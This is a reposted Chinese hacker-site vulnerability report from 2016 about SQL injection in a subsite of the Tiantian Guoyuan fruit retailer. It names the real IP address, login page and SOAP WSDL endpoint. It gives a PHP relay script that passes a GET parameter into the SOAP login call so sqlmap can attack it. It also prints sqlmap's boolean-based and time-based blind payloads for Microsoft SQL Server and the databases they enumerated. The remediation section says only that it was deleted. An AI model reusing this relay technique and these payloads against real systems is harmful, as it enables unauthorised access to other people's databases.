记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

天天果园某分站存在SQL注入

2016-07-14 09:40

支持峰会,求注册码一枚

http://180.167.72.216:88/login/Login.jsp

 

QQ图片20160707181813.png

 

http://180.167.72.216:88//services/MobileService?wsdl

 

QQ图片20160707181937.png

 

 

QQ图片20160707181955.png

 

采用别人的中转脚本

$in0=$_GET['name'];

#$in0 = $in0."' and 'a' = 'a";

header("content-type:text/html;charset=utf-8");

try {

$client = new SoapClient('http://180.167.72.216:88//services/MobileService?wsdl');

$xml = "

1

1

1

";

$result=$client->checkUserLogin(array('in0'=>$in0,'in1'=>'123456','in2'=>1));

echo $result->out ;//显示结果

} catch (SOAPFault $e) {

print_r('Exception:'.$e);

}

?>

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: name (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: name=sysadmin' AND 7195=7195 AND 'Hxbs'='Hxbs

Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)

Payload: name=sysadmin' OR 5806=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'veYf'='veYf

---

数据库

available databases [7]:

[*] ecology

[*] master

[*] model

[*] msdb

[*] ReportServer

[*] ReportServerTempDB

[*] tempdb

 

QQ图片20160707182511.png

 

解决方案:

删除了

知识来源: www.2cto.com/Article/201607/526161.html

阅读:76900 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“天天果园某分站存在SQL注入”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云